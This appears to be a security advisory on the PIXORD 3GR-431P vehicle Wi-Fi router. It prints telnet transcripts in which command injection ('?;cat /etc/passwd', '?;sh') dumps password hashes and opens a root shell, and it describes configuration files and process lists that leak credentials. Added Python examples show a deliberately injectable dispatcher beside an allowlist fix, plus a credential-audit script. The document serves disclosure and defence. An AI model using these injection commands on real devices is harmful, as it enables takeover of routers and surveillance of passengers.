# Exploit Title: [Vehicle 3G Wi-Fi Router - PIXORD - Multiple Vulnerabilities]
# Date: May 01, 2015 [No response from Vendor till date]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [http://www.pixord.com/en/products_show.php?show=17]
# Version: [Model Name :3GR-431P] [Software Version :RTA-A001_02] [Wireless Driver Version :2.6.0.0]

*Vehicle 3G Wi-Fi Router - PIXORD *
http://www.pixord.com/en/products_show.php?show=17

*Device Info *
Model Name :3GR-431P
Software Version :RTA-A001_02
Wireless Driver Version :2.6.0.0

The PiXORD 3GR-431P 3G Wi-Fi Router is a 3G + GPS + 802.11n (2T2R) wireless router. It supports Internet access via 3G and receives position information from GPS. The 3GR-431P also provides two Ethernet ports for LAN connectivity and an 802.11n Wi-Fi Access Point for WLAN connectivity. It can be installed on transportation vehicles, where passengers use a laptop or smart phone via Wi-Fi to browse the Internet on the go. The Ethernet port can also connect an IP camera to provide real-time monitoring.

Vulnerability Impact:
Easy and full device compromise. Access to configured keys, passwords, pass-phrases, accounts, etc. Ability to monitor the user / vehicle via camera / connected devices.

*Multiple Security Vulnerabilities *

*1. OS command injection *

$ telnet 192.168.1.10
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.

Vehicle 3G Wi-Fi Router
Login: admin
Password:
>
> ?
mobile3G
mobileGPS
model
reboot
restoredefault
version

As seen above, only a few specific, functional options are available for device management. However, we can bypass this and dump hashes easily.

> ?;cat /etc/passwd
sh: ?: not found
admin:<password1>:0:0:Adminstrator:/:/bin/sh
support:<password2>:0:0:Adminstrator:/:/bin/sh
user:<password3>:0:0:Adminstrator:/:/bin/sh
> exit

Note that this is also applicable when a non-admin 'user' / 'support' logs in over Telnet.
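The bypass shown above works because the restricted menu forwards the typed line to a shell, where ';' ends the intended command and starts another. As an added example (not the 3GR-431P firmware; the argv each menu keyword maps to is a hypothetical stand-in, since the real backend commands are not on the page), here is that pattern beside an allowlist dispatcher that never invokes a shell:

```python
import subprocess

# Added example, not the 3GR-431P firmware. The keywords are the ones the
# router printed for '?'; the argv each one maps to is a hypothetical
# stand-in. mobile3G, mobileGPS and restoredefault would be added the same way.
MENU = {
    "version": ["uname", "-r"],
    "model":   ["uname", "-m"],
    "reboot":  ["/sbin/reboot"],   # listed for shape only; never run in tests
}

def vulnerable_dispatch(line):
    """The pattern behind finding 1: the typed line is spliced into a shell
    command string, so ';' terminates the intended command and the rest of
    the line runs as a new one. 'echo' stands in for the real menu handler
    so the demonstration is harmless."""
    out = subprocess.run("echo menu:" + line, shell=True,
                         capture_output=True, text=True)
    return out.stdout

def safe_dispatch(line):
    """Exact-match allowlist: the fixed argv for a known keyword, else None.
    Metacharacters in the input can never reach a shell because no shell
    is involved at all."""
    return MENU.get(line.strip())

def run_menu(line):
    """What the hardened CLI does with one typed line."""
    argv = safe_dispatch(line)
    if argv is None:
        return "unknown command: " + line.strip()
    out = subprocess.run(argv, capture_output=True, text=True)  # shell=False
    return out.stdout
```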
The web application lacks strict input validation and is hence vulnerable to an OS command injection attack.

*2. Configuration not secured properly / AuthZ issues *

The device has three users - admin, support, user. Apparently, there is no separation of privileges between these 3 users when accessing over HTTP(S); all options are available to all three. This allows 'user' / 'support' to access the device configuration file - RT2880_Settings.dat. The configuration backup contains b64-encoded login passwords + clear-text WPA keys + other sensitive information.

*Sensitive information in configuration file - *

*more RT2880_Settings.dat *
#The following line must not be removed.
Default
WebInit=1
HostName=pixord
Login=admin
Password=<admin_password_here>=
Login2=support
Password2=<support_password_here>==
Login3=user
Password3=<user_password_here>==
OperationMode=1
Platform=RT3352
..... <snip> .....
wan_pppoe_user=pppoe_user
wan_pppoe_pass=pppoe_passwd
wan_l2tp_server=l2tp_server
wan_l2tp_user=l2tp_user
wan_l2tp_pass=l2tp_passwd
..... <snip> .....
wan_pptp_server=pptp_server
wan_pptp_user=pptp_user
wan_pptp_pass=pptp_passwd
..... <snip> .....
DDNS=
DDNSAccount=<ddns_account_name_here>
DDNSPassword=<ddns_password_here>
CountryRegion=
CountryRegionABand=
CountryCode=
BssidNum=1
SSID1=PiXORD
WirelessMode=9
..... <snip> .....
WscSSID=RalinkInitialAP
WscKeyMGMT=WPA-EAP
WscConfigMethod=138
WscAuthType=1
WscEncrypType=1
WscNewKey=<wsc_key_here>
IEEE8021X=0
IEEE80211H=0
CSPeriod=6
PreAuth=0
AuthMode=WPAPSKWPA2PSK
EncrypType=TKIPAES
RekeyInterval=3600
RekeyMethod=TIME
PMKCachePeriod=10
WPAPSK1=<WPA_PSK_Key_here>
DefaultKeyID=2
Key1Type=0
Key1Str1=
Key2Type=0
Key2Str1=
Key3Type=0
Key3Str1=
Key4Type=0
Key4Str1=
WapiPskType=0
..... <snip> .....
WdsEnable=0
WdsEncrypType=NONE
WdsList=
WdsKey=
WirelessEvent=0
RADIUS_Server=0
RADIUS_Port=1812
RADIUS_Key=
RADIUS_Acct_Server=
RADIUS_Acct_Port=1813
RADIUS_Acct_Key=
..... <snip> .....
wan_3g_apn=public
wan_3g_dial=*99#
wan_3g_user=
wan_3g_pass=
<snip>
RADIUS_Key1=<radius_key_here>
..... <snip> .....

Also, as observed in point 1 above, all the users have UID 0, i.e. root-level privileges on the device:

admin:<password1>:0:0:Adminstrator:/:/bin/sh
support:<password2>:0:0:Adminstrator:/:/bin/sh
user:<password3>:0:0:Adminstrator:/:/bin/sh

The application should ideally provide specific privileges to different users, and enforce strict access control.

*3. Application does not secure configured passwords (HTTPS) *

Masked password(s) can be retrieved via the frame source (inspect element) and / or by intercepting the request via a proxy.

The application should mask/censor (*****) the passwords, keys and any other crucial pieces of configuration, and must not pass the values in clear-text.

*4. Program / Scripts running in an insecure manner - leaking clear-text passwords in process information *

After logging in to the device over Telnet, we can drop into a shell via the OS command injection attack described in point 1.

> ?;sh
sh: ?: not found


Enter 'help' for a list of built-in commands.

BusyBox v1.12.1 (2012-12-25 11:48:22 CST) built-in shell (ash)

#

Checking the running processes reveals a system program, *inadyn*, which apparently is a service for DDNS connectivity, leaking a valid username and password in clear-text.

# ps aux
  PID USER       VSZ STAT COMMAND
    1 admin     1768 S    init
    2 admin        0 RWN  [ksoftirqd/0]
..... <snip> .....
 2159 admin     1096 S    inadyn -u *<ddns-username_here>* -p *<ddns-password_here>* -a *<ddns_domain_here>*
 4050 admin     1768 R    ps aux

The programs should be run securely, without passing CLI arguments and parameter values in clear-text.

--
Best Regards,
Karn Ganeshen
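Findings 2 and 4 above (secrets in the RT2880_Settings.dat backup, a DDNS password in inadyn's argv) are the kind of exposure an auditor can check for on a firmware dump or a shell session. The following audit is an added example, not the vendor's or the author's code: the config and ps samples are constructed in the layouts shown above with made-up values, and the list of password-carrying flags is a heuristic that needs triage.

```python
import base64
import re
import shlex
# Constructed sample in the layout of the RT2880_Settings.dat dump above.
SAMPLE_CONFIG = """\
#The following line must not be removed.
Login=admin
Password=c2VjcmV0MQ==
wan_pppoe_pass=pppoe_passwd
WPAPSK1=correct-horse-battery
Key1Type=0
DDNSPassword=ddnspw
"""
# Constructed 'ps aux' lines in the shape shown under finding 4.
SAMPLE_PS = """\
PID USER VSZ STAT COMMAND
1 admin 1768 S init
2159 admin 1096 S inadyn -u ddnsuser -p ddnspw -a host.example.invalid
4050 admin 1768 R ps aux
"""
# Setting names that carry secrets in this format (from the page's key names).
SECRET_KEY = re.compile(r"(?i)(password|_pass$|psk\d*$|key\d*$|^key\dstr)")
PASSWORD_FLAGS = {"-p", "--password", "--pass"}  # heuristic; inadyn uses -p

def audit_config(text):
    """Map each populated secret-bearing setting to its effective value."""
    found = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if line.startswith("#") or not sep or not value or not SECRET_KEY.search(key):
            continue
        if key.startswith("Password"):  # base64 on this device: reversible, not protection
            try:
                value = base64.b64decode(value, validate=True).decode()
            except (ValueError, UnicodeDecodeError):
                pass  # not base64: report the raw value
        found[key] = value
    return found

def audit_ps(text):
    """List (pid, program) for processes exposing a password in argv."""
    hits = []
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split(None, 4)
        if len(fields) == 5:
            argv = shlex.split(fields[4])
            if PASSWORD_FLAGS.intersection(argv):  # readable via ps or /proc
                hits.append((fields[0], argv[0]))
    return hits
```

Keys such as Key1Type, whose names resemble secrets but hold mode flags, are deliberately not matched, so a clean run reports only the populated credentials.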